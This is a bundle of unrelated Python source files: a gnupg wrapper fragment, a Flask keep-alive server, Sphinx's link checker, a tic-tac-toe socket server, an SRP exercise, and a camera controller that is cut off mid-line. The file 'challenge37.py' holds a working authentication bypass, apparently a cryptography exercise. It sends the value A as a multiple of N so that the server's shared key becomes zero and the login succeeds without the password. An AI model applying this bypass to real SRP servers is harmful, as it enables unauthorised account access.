>>> assert print2 in pubkeys.fingerprints
"""
result = ImportResult()
self._handle_io(['--import'], _make_file(key_data), result)
return result
def delete_keys(self, fingerprints, secret=False):
which='key'
if secret:
which='secret-key'
if _is_sequence(fingerprints):
fingerprints = ' '.join(fingerprints)
args = ["--batch --delete-%s %s" % (which, fingerprints)]
result = DeleteResult()
p = self._open_subprocess(args)
self._collect_output(p, result)
return result
def export_keys(self, keyids, secret=False):
"export the indicated keys. 'keyid' is anything gpg accepts"
which=''
if secret:
which='-secret-key'
if _is_sequence(keyids):
keyids = ' '.join(keyids)
args = ["--armor --export%s %s" % (which, keyids)]
p = self._open_subprocess(args)
# gpg --export produces no status-fd output; stdout will be
# empty in case of failure
#stdout, stderr = p.communicate()
result = DeleteResult() # any result will do
self._collect_output(p, result)
return result.data
def list_keys(self, secret=False):
""" list the keys currently in the keyring
>>> import shutil
>>> shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> pubkeys = gpg.list_keys()
>>> assert print1 in pubkeys.fingerprints
>>> assert print2 in pubkeys.fingerprints
"""
which='keys'
if secret:
which='secret-keys'
args = "--list-%s --fixed-list-mode --fingerprint --with-colons" % (which)
args = [args]
p = self._open_subprocess(args)
# there might be some status thingumy here I should handle... (amk)
# ...nope, unless you care about expired sigs or keys (stevegt)
# Get the response information
result = ListKeys()
self._collect_output(p, result)
stdout = _make_file(result.data)
valid_keywords = 'pub uid sec fpr'.split()
while True:
line = stdout.readline()
if self.verbose:
print(line)
logger.debug("%s", line.rstrip())
if not line:
break
L = line.strip().split(':')
if not L:
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
def gen_key(self, input):
"""Generate a key; you might use gen_key_input() to create the
control input.
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> assert result
>>> result = gpg.gen_key('foo')
>>> assert not result
"""
args = ["--gen-key --batch"]
result = GenKey()
file = _make_file(input)
self._handle_io(args, file, result)
return result
def gen_key_input(self, **kwargs):
"""
Generate --gen-key input per gpg doc/DETAILS
"""
parms = {}
for key, val in list(kwargs.items()):
key = key.replace('_','-').title()
parms[key] = val
parms.setdefault('Key-Type','RSA')
parms.setdefault('Key-Length',1024)
parms.setdefault('Name-Real', "Autogenerated Key")
parms.setdefault('Name-Comment', "Generated by gnupg.py")
try:
logname = os.environ['LOGNAME']
except KeyError:
logname = os.environ['USERNAME']
hostname = socket.gethostname()
parms.setdefault('Name-Email', "%s@%s" % (logname.replace(' ', '_'),
hostname))
out = "Key-Type: %s\n" % parms.pop('Key-Type')
for key, val in list(parms.items()):
out += "%s: %s\n" % (key, val)
out += "%commit\n"
return out
# Key-Type: RSA
# Key-Length: 1024
# Name-Real: ISdlink Server on %s
# Name-Comment: Created by %s
# Name-Email: isdlink@%s
# Expire-Date: 0
# %commit
#
#
# Key-Type: DSA
# Key-Length: 1024
# Subkey-Type: ELG-E
# Subkey-Length: 1024
# Name-Real: Joe Tester
# Name-Comment: with stupid passphrase
# Name-Email: joe@foo.bar
# Expire-Date: 0
# Passphrase: abc
# %pubring foo.pub
# %secring foo.sec
# %commit
#
# ENCRYPTION
#
def encrypt_file(self, file, recipients, sign=None,
always_trust=False, passphrase=None,
armor=True, output=None):
"Encrypt the message read from the file-like object 'file'"
args = ['--encrypt']
rname = None
rname_fd = None
if armor: # create ascii-armored output - set to False for binary output
args.append('--armor')
if output: # write the output to a file with the specified name
if os.path.exists(output):
rname = output
rname_fd, output = tempfile.mkstemp()
os.remove(output)
args.append('--output %s' % output)
if not _is_sequence(recipients):
recipients = (recipients,)
for recipient in recipients:
args.append('--recipient %s' % recipient)
if sign:
args.append("--sign --default-key %s" % sign)
if always_trust:
args.append("--always-trust")
result = Crypt()
self._handle_io(args, file, result, passphrase=passphrase)
        if result.ok and rname is not None:
shutil.copyfile(output, rname)
os.close(rname_fd)
os.remove(output) # to avoid overwrite confirmation message
return result
def encrypt(self, data, recipients, **kwargs):
"""Encrypt the message contained in the string 'data'
>>> import shutil
>>> if os.path.exists("keys"):
... shutil.rmtree("keys")
>>> gpg = GPG(gnupghome="keys")
>>> input = gpg.gen_key_input(passphrase='foo')
>>> result = gpg.gen_key(input)
>>> print1 = result.fingerprint
>>> input = gpg.gen_key_input()
>>> result = gpg.gen_key(input)
>>> print2 = result.fingerprint
>>> result = gpg.encrypt("hello",print2)
>>> message = str(result)
>>> assert message != 'hello'
>>> result = gpg.decrypt(message)
>>> assert result
>>> str(result)
'hello'
>>> result = gpg.encrypt("hello again",print1)
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status
'need passphrase'
>>> result = gpg.decrypt(message,passphrase='bar')
>>> result.status
'decryption failed'
>>> assert not result
>>> result = gpg.decrypt(message,passphrase='foo')
>>> result.status
'decryption ok'
>>> str(result)
'hello again'
>>> result = gpg.encrypt("signed hello",print2,sign=print1)
>>> result.status
'need passphrase'
>>> result = gpg.encrypt("signed hello",print2,sign=print1,passphrase='foo')
>>> result.status
'encryption ok'
>>> message = str(result)
>>> result = gpg.decrypt(message)
>>> result.status
'decryption ok'
>>> assert result.fingerprint == print1
"""
return self.encrypt_file(_make_file(data), recipients, **kwargs)
def decrypt(self, message, **kwargs):
return self.decrypt_file(_make_file(message), **kwargs)
def decrypt_file(self, file, always_trust=False, passphrase=None,
output=None):
args = ["--decrypt"]
if output: # write the output to a file with the specified name
if os.path.exists(output):
os.remove(output) # to avoid overwrite confirmation message
args.append('--output %s' % output)
if always_trust:
args.append("--always-trust")
result = Crypt()
self._handle_io(args, file, result, passphrase)
return result
class Verify(object):
"Handle status messages for --verify"
def __init__(self):
self.valid = False
self.fingerprint = self.creation_date = self.timestamp = None
self.signature_id = self.key_id = None
self.username = None
def __nonzero__(self):
return self.valid
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in ("TRUST_UNDEFINED", "TRUST_NEVER", "TRUST_MARGINAL",
"TRUST_FULLY", "TRUST_ULTIMATE"):
pass
elif key in ("PLAINTEXT", "PLAINTEXT_LENGTH", "DECRYPTION_INFO"):
pass
elif key == "BADSIG":
self.valid = False
self.key_id, self.username = value.split(None, 1)
elif key == "GOODSIG":
self.valid = True
self.key_id, self.username = value.split(None, 1)
elif key == "VALIDSIG":
(self.fingerprint,
self.creation_date,
self.sig_timestamp,
self.expire_timestamp) = value.split()[:4]
elif key == "SIG_ID":
(self.signature_id,
self.creation_date, self.timestamp) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class ImportResult(object):
"Handle status messages for --import"
counts = '''count no_user_id imported imported_rsa unchanged
n_uids n_subk n_sigs n_revoc sec_read sec_imported
sec_dups not_imported'''.split()
def __init__(self):
self.imported = []
self.results = []
self.fingerprints = []
for result in self.counts:
setattr(self, result, None)
def __nonzero__(self):
if self.not_imported: return False
if not self.fingerprints: return False
return True
__bool__ = __nonzero__
ok_reason = {
'0': 'Not actually changed',
'1': 'Entirely new key',
'2': 'New user IDs',
'4': 'New signatures',
'8': 'New subkeys',
'16': 'Contains private key',
}
problem_reason = {
'0': 'No specific reason given',
'1': 'Invalid Certificate',
'2': 'Issuer Certificate missing',
'3': 'Certificate Chain too long',
'4': 'Error storing certificate',
}
def handle_status(self, key, value):
if key == "IMPORTED":
# this duplicates info we already see in import_ok & import_problem
pass
elif key == "NODATA":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'No valid data found'})
elif key == "IMPORT_OK":
reason, fingerprint = value.split()
reasons = []
for code, text in list(self.ok_reason.items()):
if int(reason) | int(code) == int(reason):
reasons.append(text)
reasontext = '\n'.join(reasons) + "\n"
self.results.append({'fingerprint': fingerprint,
'ok': reason, 'text': reasontext})
self.fingerprints.append(fingerprint)
elif key == "IMPORT_PROBLEM":
try:
reason, fingerprint = value.split()
except:
reason = value
fingerprint = '<unknown>'
self.results.append({'fingerprint': fingerprint,
'problem': reason, 'text': self.problem_reason[reason]})
elif key == "IMPORT_RES":
import_res = value.split()
for i in range(len(self.counts)):
setattr(self, self.counts[i], int(import_res[i]))
else:
raise ValueError("Unknown status message: %r" % key)
def summary(self):
l = []
l.append('%d imported'%self.imported)
if self.not_imported:
l.append('%d not imported'%self.not_imported)
return ', '.join(l)
class ListKeys(list):
''' Handle status messages for --list-keys.
Handle pub and uid (relating the latter to the former).
Don't care about (info from src/DETAILS):
crt = X.509 certificate
crs = X.509 certificate and private key available
sub = subkey (secondary key)
ssb = secret subkey (secondary key)
uat = user attribute (same as user id except for field 10).
sig = signature
rev = revocation signature
pkd = public key data (special field format, see below)
grp = reserved for gpgsm
rvk = revocation key
'''
def __init__(self):
self.curkey = None
self.fingerprints = []
def key(self, args):
vars = ("""
type trust length algo keyid date expires dummy ownertrust uid
""").split()
self.curkey = {}
for i in range(len(vars)):
self.curkey[vars[i]] = args[i]
self.curkey['uids'] = [self.curkey['uid']]
del self.curkey['uid']
self.append(self.curkey)
pub = sec = key
def fpr(self, args):
self.curkey['fingerprint'] = args[9]
self.fingerprints.append(args[9])
def uid(self, args):
self.curkey['uids'].append(args[9])
def handle_status(self, key, value):
pass
class Crypt(Verify):
"Handle status messages for --encrypt and --decrypt"
def __init__(self):
Verify.__init__(self)
self.data = ''
self.ok = False
self.status = ''
def __nonzero__(self):
if self.ok: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.data
def handle_status(self, key, value):
if key in ("ENC_TO", "USERID_HINT", "GOODMDC", "END_DECRYPTION",
"BEGIN_SIGNING", "NO_SECKEY"):
pass
elif key in ("NEED_PASSPHRASE", "BAD_PASSPHRASE", "GOOD_PASSPHRASE",
"DECRYPTION_FAILED"):
self.status = key.replace("_", " ").lower()
elif key == "BEGIN_DECRYPTION":
self.status = 'decryption incomplete'
elif key == "BEGIN_ENCRYPTION":
self.status = 'encryption incomplete'
elif key == "DECRYPTION_OKAY":
self.status = 'decryption ok'
self.ok = True
elif key == "END_ENCRYPTION":
self.status = 'encryption ok'
self.ok = True
elif key == "INV_RECP":
self.status = 'invalid recipient'
elif key == "KEYEXPIRED":
self.status = 'key expired'
elif key == "SIG_CREATED":
self.status = 'sig created'
elif key == "SIGEXPIRED":
self.status = 'sig expired'
else:
Verify.handle_status(self, key, value)
class GenKey(object):
"Handle status messages for --gen-key"
def __init__(self):
self.type = None
self.fingerprint = None
def __nonzero__(self):
if self.fingerprint: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.fingerprint or ''
def handle_status(self, key, value):
if key in ("PROGRESS", "GOOD_PASSPHRASE", "NODATA"):
pass
elif key == "KEY_CREATED":
(self.type,self.fingerprint) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class DeleteResult(object):
"Handle status messages for --delete-key and --delete-secret-key"
def __init__(self):
self.status = 'ok'
def __str__(self):
return self.status
problem_reason = {
'1': 'No such key',
'2': 'Must delete secret key first',
'3': 'Ambigious specification',
}
def handle_status(self, key, value):
if key == "DELETE_PROBLEM":
self.status = self.problem_reason.get(value,
"Unknown error: %r" % value)
else:
raise ValueError("Unknown status message: %r" % key)
class Sign(object):
"Handle status messages for --sign"
def __init__(self):
self.type = None
self.fingerprint = None
def __nonzero__(self):
if self.fingerprint: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.data or ''
def handle_status(self, key, value):
if key in ("USERID_HINT", "NEED_PASSPHRASE", "BAD_PASSPHRASE",
"GOOD_PASSPHRASE", "BEGIN_SIGNING"):
pass
elif key == "SIG_CREATED":
(self.type,
algo, hashalgo, cls,
self.timestamp, self.fingerprint
) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
|
main.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Your Bot Is Ready"
def run():
app.run(host="0.0.0.0", port=8000)
def keep_alive():
server = Thread(target=run)
server.start()
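# Usage sketch (assumption, not part of the original file): a bot script would import
# keep_alive() so the Flask server runs on a background thread while the bot occupies
# the main thread, e.g.
#
#     from main import keep_alive
#     keep_alive()
#     bot.run(TOKEN)    # hypothetical bot object and token
#
# Running this module directly just serves the health-check page in the foreground.
if __name__ == '__main__':
    run()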
|
linkcheck.py
|
"""
sphinx.builders.linkcheck
~~~~~~~~~~~~~~~~~~~~~~~~~
The CheckExternalLinksBuilder class.
:copyright: Copyright 2007-2020 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import json
import queue
import re
import socket
import threading
from html.parser import HTMLParser
from os import path
from typing import Any, Dict, List, Set, Tuple
from urllib.parse import unquote, urlparse
from docutils import nodes
from docutils.nodes import Node
from requests.exceptions import HTTPError
from sphinx.application import Sphinx
from sphinx.builders import Builder
from sphinx.locale import __
from sphinx.util import encode_uri, requests, logging
from sphinx.util.console import ( # type: ignore
purple, red, darkgreen, darkgray, turquoise
)
from sphinx.util.nodes import get_node_line
from sphinx.util.requests import is_ssl_error
logger = logging.getLogger(__name__)
uri_re = re.compile('([a-z]+:)?//') # matches to foo:// and // (a protocol relative URL)
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml;q=0.9,*/*;q=0.8',
}
class AnchorCheckParser(HTMLParser):
"""Specialized HTML parser that looks for a specific anchor."""
def __init__(self, search_anchor: str) -> None:
super().__init__()
self.search_anchor = search_anchor
self.found = False
def handle_starttag(self, tag: Any, attrs: Any) -> None:
for key, value in attrs:
if key in ('id', 'name') and value == self.search_anchor:
self.found = True
break
def check_anchor(response: requests.requests.Response, anchor: str) -> bool:
"""Reads HTML data from a response object `response` searching for `anchor`.
Returns True if anchor was found, False otherwise.
"""
parser = AnchorCheckParser(anchor)
# Read file in chunks. If we find a matching anchor, we break
# the loop early in hopes not to have to download the whole thing.
for chunk in response.iter_content(chunk_size=4096, decode_unicode=True):
if isinstance(chunk, bytes): # requests failed to decode
chunk = chunk.decode() # manually try to decode it
parser.feed(chunk)
if parser.found:
break
parser.close()
return parser.found
class CheckExternalLinksBuilder(Builder):
"""
Checks for broken external links.
"""
name = 'linkcheck'
epilog = __('Look for any errors in the above output or in '
'%(outdir)s/output.txt')
def init(self) -> None:
self.to_ignore = [re.compile(x) for x in self.app.config.linkcheck_ignore]
self.anchors_ignore = [re.compile(x)
for x in self.app.config.linkcheck_anchors_ignore]
self.auth = [(re.compile(pattern), auth_info) for pattern, auth_info
in self.app.config.linkcheck_auth]
self.good = set() # type: Set[str]
self.broken = {} # type: Dict[str, str]
self.redirected = {} # type: Dict[str, Tuple[str, int]]
# set a timeout for non-responding servers
socket.setdefaulttimeout(5.0)
# create output file
open(path.join(self.outdir, 'output.txt'), 'w').close()
# create JSON output file
open(path.join(self.outdir, 'output.json'), 'w').close()
# create queues and worker threads
self.wqueue = queue.Queue() # type: queue.Queue
self.rqueue = queue.Queue() # type: queue.Queue
self.workers = [] # type: List[threading.Thread]
for i in range(self.app.config.linkcheck_workers):
thread = threading.Thread(target=self.check_thread)
thread.setDaemon(True)
thread.start()
self.workers.append(thread)
def check_thread(self) -> None:
kwargs = {
'allow_redirects': True,
} # type: Dict
if self.app.config.linkcheck_timeout:
kwargs['timeout'] = self.app.config.linkcheck_timeout
def get_request_headers() -> Dict:
url = urlparse(uri)
candidates = ["%s://%s" % (url.scheme, url.netloc),
"%s://%s/" % (url.scheme, url.netloc),
uri,
"*"]
for u in candidates:
if u in self.config.linkcheck_request_headers:
headers = dict(DEFAULT_REQUEST_HEADERS)
headers.update(self.config.linkcheck_request_headers[u])
return headers
return {}
def check_uri() -> Tuple[str, str, int]:
# split off anchor
if '#' in uri:
req_url, anchor = uri.split('#', 1)
for rex in self.anchors_ignore:
if rex.match(anchor):
anchor = None
break
else:
req_url = uri
anchor = None
# handle non-ASCII URIs
try:
req_url.encode('ascii')
except UnicodeError:
req_url = encode_uri(req_url)
# Get auth info, if any
for pattern, auth_info in self.auth:
if pattern.match(uri):
break
else:
auth_info = None
# update request headers for the URL
kwargs['headers'] = get_request_headers()
try:
if anchor and self.app.config.linkcheck_anchors:
# Read the whole document and see if #anchor exists
response = requests.get(req_url, stream=True, config=self.app.config,
auth=auth_info, **kwargs)
found = check_anchor(response, unquote(anchor))
if not found:
raise Exception(__("Anchor '%s' not found") % anchor)
else:
try:
# try a HEAD request first, which should be easier on
# the server and the network
response = requests.head(req_url, config=self.app.config,
auth=auth_info, **kwargs)
response.raise_for_status()
except HTTPError:
# retry with GET request if that fails, some servers
# don't like HEAD requests.
response = requests.get(req_url, stream=True, config=self.app.config,
auth=auth_info, **kwargs)
response.raise_for_status()
except HTTPError as err:
if err.response.status_code == 401:
# We'll take "Unauthorized" as working.
return 'working', ' - unauthorized', 0
elif err.response.status_code == 503:
# We'll take "Service Unavailable" as ignored.
return 'ignored', str(err), 0
else:
return 'broken', str(err), 0
except Exception as err:
if is_ssl_error(err):
return 'ignored', str(err), 0
else:
return 'broken', str(err), 0
if response.url.rstrip('/') == req_url.rstrip('/'):
return 'working', '', 0
else:
new_url = response.url
if anchor:
new_url += '#' + anchor
# history contains any redirects, get last
if response.history:
code = response.history[-1].status_code
return 'redirected', new_url, code
else:
return 'redirected', new_url, 0
def check() -> Tuple[str, str, int]:
# check for various conditions without bothering the network
if len(uri) == 0 or uri.startswith(('#', 'mailto:')):
return 'unchecked', '', 0
elif not uri.startswith(('http:', 'https:')):
if uri_re.match(uri):
# non supported URI schemes (ex. ftp)
return 'unchecked', '', 0
else:
if path.exists(path.join(self.srcdir, uri)):
return 'working', '', 0
else:
for rex in self.to_ignore:
if rex.match(uri):
return 'ignored', '', 0
else:
return 'broken', '', 0
elif uri in self.good:
return 'working', 'old', 0
elif uri in self.broken:
return 'broken', self.broken[uri], 0
elif uri in self.redirected:
return 'redirected', self.redirected[uri][0], self.redirected[uri][1]
for rex in self.to_ignore:
if rex.match(uri):
return 'ignored', '', 0
# need to actually check the URI
for _ in range(self.app.config.linkcheck_retries):
status, info, code = check_uri()
if status != "broken":
break
if status == "working":
self.good.add(uri)
elif status == "broken":
self.broken[uri] = info
elif status == "redirected":
self.redirected[uri] = (info, code)
return (status, info, code)
while True:
uri, docname, lineno = self.wqueue.get()
if uri is None:
break
status, info, code = check()
self.rqueue.put((uri, docname, lineno, status, info, code))
def process_result(self, result: Tuple[str, str, int, str, str, int]) -> None:
uri, docname, lineno, status, info, code = result
filename = self.env.doc2path(docname, None)
linkstat = dict(filename=filename, lineno=lineno,
status=status, code=code, uri=uri,
info=info)
if status == 'unchecked':
self.write_linkstat(linkstat)
return
if status == 'working' and info == 'old':
self.write_linkstat(linkstat)
return
if lineno:
logger.info('(line %4d) ', lineno, nonl=True)
if status == 'ignored':
if info:
logger.info(darkgray('-ignored- ') + uri + ': ' + info)
else:
logger.info(darkgray('-ignored- ') + uri)
self.write_linkstat(linkstat)
elif status == 'local':
logger.info(darkgray('-local- ') + uri)
self.write_entry('local', docname, filename, lineno, uri)
self.write_linkstat(linkstat)
elif status == 'working':
logger.info(darkgreen('ok ') + uri + info)
self.write_linkstat(linkstat)
elif status == 'broken':
if self.app.quiet or self.app.warningiserror:
logger.warning(__('broken link: %s (%s)'), uri, info,
location=(filename, lineno))
else:
logger.info(red('broken ') + uri + red(' - ' + info))
self.write_entry('broken', docname, filename, lineno, uri + ': ' + info)
self.write_linkstat(linkstat)
elif status == 'redirected':
try:
text, color = {
301: ('permanently', purple),
302: ('with Found', purple),
303: ('with See Other', purple),
307: ('temporarily', turquoise),
308: ('permanently', purple),
}[code]
except KeyError:
text, color = ('with unknown code', purple)
linkstat['text'] = text
logger.info(color('redirect ') + uri + color(' - ' + text + ' to ' + info))
self.write_entry('redirected ' + text, docname, filename,
lineno, uri + ' to ' + info)
self.write_linkstat(linkstat)
def get_target_uri(self, docname: str, typ: str = None) -> str:
return ''
def get_outdated_docs(self) -> Set[str]:
return self.env.found_docs
def prepare_writing(self, docnames: Set[str]) -> None:
return
def write_doc(self, docname: str, doctree: Node) -> None:
logger.info('')
n = 0
# reference nodes
for refnode in doctree.traverse(nodes.reference):
if 'refuri' not in refnode:
continue
uri = refnode['refuri']
lineno = get_node_line(refnode)
self.wqueue.put((uri, docname, lineno), False)
n += 1
# image nodes
for imgnode in doctree.traverse(nodes.image):
uri = imgnode['candidates'].get('?')
if uri and '://' in uri:
lineno = get_node_line(imgnode)
self.wqueue.put((uri, docname, lineno), False)
n += 1
done = 0
while done < n:
self.process_result(self.rqueue.get())
done += 1
if self.broken:
self.app.statuscode = 1
def write_entry(self, what: str, docname: str, filename: str, line: int,
uri: str) -> None:
with open(path.join(self.outdir, 'output.txt'), 'a') as output:
output.write("%s:%s: [%s] %s\n" % (filename, line, what, uri))
def write_linkstat(self, data: dict) -> None:
with open(path.join(self.outdir, 'output.json'), 'a') as output:
output.write(json.dumps(data))
output.write('\n')
def finish(self) -> None:
for worker in self.workers:
self.wqueue.put((None, None, None), False)
def setup(app: Sphinx) -> Dict[str, Any]:
app.add_builder(CheckExternalLinksBuilder)
app.add_config_value('linkcheck_ignore', [], None)
app.add_config_value('linkcheck_auth', [], None)
app.add_config_value('linkcheck_request_headers', {}, None)
app.add_config_value('linkcheck_retries', 1, None)
app.add_config_value('linkcheck_timeout', None, None, [int])
app.add_config_value('linkcheck_workers', 5, None)
app.add_config_value('linkcheck_anchors', True, None)
# Anchors starting with ! are ignored since they are
# commonly used for dynamic pages
app.add_config_value('linkcheck_anchors_ignore', ["^!"], None)
return {
'version': 'builtin',
'parallel_read_safe': True,
'parallel_write_safe': True,
}
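# Illustrative conf.py settings for this builder (all values below are
# hypothetical; the option names are the ones registered in setup() above):
#
#   linkcheck_ignore = [r'https://localhost:\d+/']
#   linkcheck_timeout = 10
#   linkcheck_workers = 10
#   linkcheck_anchors_ignore = ['^!', '^top$']
#
# The builder is then invoked with:  sphinx-build -b linkcheck ./source ./build/linkcheck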
|
TicTacToeServer.py
|
import socket
import threading
import queue
from threading import Thread
from time import sleep
import select
import sys
import json
from TicTacToeMessage import TicTacToeLoginMessage
from TicTacToeMessage import TicTacToeStartStop
from TicTacToeMessage import TicTacToeGameMessage
player_dict = dict ()
player_symbol = ['X', 'O']
def checkWinner (move):
    # Each cell is scored so that a line of three 'X' sums to 3 and a line of
    # three 'O' sums to 12; no mixed line can ever reach either total.
    count = 0
    status = False
    row = [0, 0, 0]
    col = [0, 0, 0]
    diag = [0, 4, 8]        # main diagonal indices
    anti_diag = [2, 4, 6]   # anti-diagonal indices
    sum_diag = 0
    sum_anti_diag = 0
    total_set = 0
    while (count < 9):
        index = (int)(count / 3)
        for i in range (3):
            if (move [count + i] == 'X'):
                row [index] += 1
                col [i] += 1
                total_set += 1
                if ((count + i) in diag):
                    sum_diag += 1
                if ((count + i) in anti_diag):
                    sum_anti_diag += 1
            elif (move [count + i] == 'O'):
                total_set += 1
                row [index] += 4
                col [i] += 4
                if ((count + i) in diag):
                    sum_diag += 4
                if ((count + i) in anti_diag):
                    sum_anti_diag += 4
        count += 3
    if (3 in row or 12 in row) or (3 in col or 12 in col) or \
       (sum_diag in (3, 12)) or (sum_anti_diag in (3, 12)):
        return (True, True)
    if (total_set == 9):
        status = True
    return (status, False)
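# A minimal sketch of how checkWinner reads a 9-cell board (the boards below
# are hypothetical and not part of the wire protocol). It returns a tuple
# (game_over, has_winner).
def _demo_check_winner():
    x_wins = ['X', 'X', 'X',
              'O', 'O', ' ',
              ' ', ' ', ' ']
    print(checkWinner(x_wins))   # (True, True)  -> X completed the top row
    tie = ['X', 'O', 'X',
           'X', 'O', 'O',
           'O', 'X', 'X']
    print(checkWinner(tie))      # (True, False) -> board full, no winner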
def readLoop (readable, inputs, outputs, server, message_queues):
# Handle inputs
for s in readable:
if s is server:
# A "readable" server socket is ready to accept a connection
connection, client_address = s.accept()
print ("new connection from : %s ", client_address)
connection.setblocking(0)
inputs.append(connection)
# Give the connection a queue for data we want to send
message_queues[connection] = queue.Queue()
else:
data = s.recv(1024)
if data:
# A readable client socket has data
# print (s)
# print (s.getpeername ())
# print (str (s.getpeername ()[0])+":"+str (s.getpeername ()[1]))
body = json.loads (data.decode ("utf-8"))
if (body ['Action'] == 'LOGIN'):
msg = TicTacToeLoginMessage (body ['Player'], body ['Action'])
msg.setmsg (data)
player_dict [s] = msg.getPlayerName ()
if (len (player_dict) == 2):
start = TicTacToeStartStop ('START')
message_queues [s].put (start.getmsg())
else:
message_queues[s].put (data)
# Add output channel for response
if s not in outputs:
outputs.append(s)
else:
# Interpret empty result as closed connection
# print >>sys.stderr, 'closing', client_address, 'after reading no data'
# Stop listening for input on the connection
if s in outputs:
outputs.remove(s)
inputs.remove(s)
s.close()
# Remove message queue
del message_queues[s]
if s in player_dict.keys ():
del player_dict [s]
stop = TicTacToeStartStop ('STOP')
for sockt,m in message_queues.items ():
m.put (stop.getmsg ())
def writeLoop (message_queues, outputs):
for m in message_queues:
size = 0
if (not message_queues [m].empty ()):
size = message_queues [m].qsize ();
while (size > 0):
item = message_queues [m].get (False, None)
body = json.loads (item)
if (body ['Action'] == 'START' and len(player_dict) == 2):
for sock, player in player_dict.items():
if (sock != m):
player_msg_1 = TicTacToeGameMessage (player_dict [m], 'PLAYER_TURN')
player_msg_1.setPlayer1 (player, player_symbol [0])
player_msg_1.setPlayerTurn (player)
for sock, player in player_dict.items():
if (sock == m):
player_msg_1.setPlayer2 (player, player_symbol [1])
move = []
for i in range (9):
move.append (' ')
player_msg_1.setPlayerMove (move)
for s in outputs:
s.send (player_msg_1.getmsg ())
elif (body ['Action'] == 'STOP'):
player_msg_1 = TicTacToeGameMessage ('None', 'GAME_VOID')
for s in outputs:
s.send (player_msg_1.getmsg ())
player_dict.clear ()
elif (body ['Action'] == 'SERVER_TURN'):
player_msg = TicTacToeGameMessage ()
player_msg.setmsg (item)
status = checkWinner (player_msg.getPlayerMove ())
if (status [0]):
if (status [1]):
print (" We have winnder ", player_msg.getPlayerTurn ())
else:
print ("We have Tie")
player_msg.setPlayerTurn ("None (Tie)")
player_msg.setPlayerAction('GAME_RESULT')
player_dict.clear ()
else:
for player in player_dict.values ():
if (player != player_msg.getPlayerTurn ()):
player_msg.setPlayerTurn (player)
break
player_msg.setPlayerAction ('PLAYER_TURN')
for s in outputs:
s.send (player_msg.getmsg ())
size-=1
def exceptLoop (s):
pass
def serverLoop (server):
read_fd = [server]
write_fd = []
except_fd = []
message_queues = {}
while (1):
readlist,writelist,except_list = select.select (read_fd, write_fd,read_fd,None)
readLoop (readlist, read_fd, write_fd, server, message_queues)
writeLoop (message_queues, write_fd)
exceptLoop (server)
def ServerMain ():
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 50000 # Reserve a port for your service.
print ('Server started!')
print ('Waiting for clients...')
s.bind((host, port)) # Bind to the port
s.listen(2) # Now wait for client connection.
thread = Thread(target = serverLoop, args = (s,))
thread.start()
thread.join()
if __name__ == '__main__':
ServerMain ()
|
challenge37.py
|
from threading import Thread
from .challenge36 import (
create_connection,
get_srp_constants,
hmac_sha256,
num_to_bytes,
sha256_hash,
srp_server,
)
def fake_srp_client(channel, A_val):
email = b"realemail@definitelynotfake.net"
N, g, k = get_srp_constants()
channel.send((email, A_val))
salt, B = channel.receive()
    # Because A was sent as a multiple of N, the server's shared secret
    # S = (A * v**u) ** b % N collapses to 0, so the client can derive the
    # session key without knowing the password.
    S = 0
    K = sha256_hash(num_to_bytes(S))
hmac = hmac_sha256(K, salt)
channel.send(hmac)
def challenge37():
actual_password = b"actual password"
N, g, k = get_srp_constants()
for i in range(10):
print(f"I = {i}")
A_val = i * N
endpoint1, endpoint2 = create_connection()
server = Thread(target=srp_server, args=(endpoint1, actual_password))
server.start()
fake_srp_client(endpoint2, A_val)
server.join()
if __name__ == "__main__":
challenge37()
|
basler_controller.py
|
# LoadAndSaveConfig.py
from pypylon import pylon
from queue import Queue
import platform
import time
import threading
import shutil
import os
import imageio
#import logging, sys
class BaslerController(object):
""" Controller class for the basler camera """
def __init__(self, folder_path, queue):
self.queue = queue
self.img = pylon.PylonImage()
self.cam = pylon.InstantCamera(pylon.TlFactory.GetInstance().CreateFirstDevice())
self.nbr_im = 9
self.folder_path = folder_path
os.mkdir(self.folder_path) # unique folder for this measurement
self.counter = 0
self.thread_move = None
self.nodefile = "acA1920-155um_bin_3.pfs"#"daA1600-60um_gain.pfs"#"acA1920-155um_bin_2.pfs"#"daA1600-60um_gain.pfs"
def open_camera(self):
self.cam.Open()
def close_camera(self):
self.cam.Close()
def update_nodemap_value(self, field, new_value):
file = open(self.nodefile, "r")
new_file_contents = ""
for line in file:
if field in line:
print(field + "updated from {} to {}".format(line.split()[1], str(new_value)))
line = line.replace(line.split()[1], str(new_value))
new_file_contents += line
file.close()
file = open(self.nodefile, "w")
file.write(new_file_contents)
file.close()
def get_nodemap_value(self, field):
file = open(self.nodefile, "r")
for line in file:
if field in line:
print("{} is {}".format(field, line.split()[1]))
value = float(line.split()[1])
if value.is_integer():
value = int(value)
return(value)
raise KeyError("{} not in Nodefile {}".format(field, self.nodefile))
def copy_nodemap(self):
shutil.copy(self.nodefile, self.folder_path + self.nodefile)
def update_nodemap(self):
# The name of the pylon file handle
#shutil.copy(self.nodefile, self.folder_path + self.nodefile) # make a copy of the settings used for this measurement
# Print the model name of the camera.
print("Using device ", self.cam.GetDeviceInfo().GetModelName())
# featurePersistence = pylon.FeaturePersistence()
# read the content of the file back to the camera's node map with enabled validation.
print("Updating nodefile {} to camera's node map.".format(self.nodefile))
pylon.FeaturePersistence.Load(self.nodefile, self.cam.GetNodeMap(), True)
def cont_acq(self):
"""starting a continuos exposure, stopped by setting the stop function"""
self._stop_cont_acq = False
self._save_images = False
self.thread_cont = threading.Thread(target=self._cont_acq,
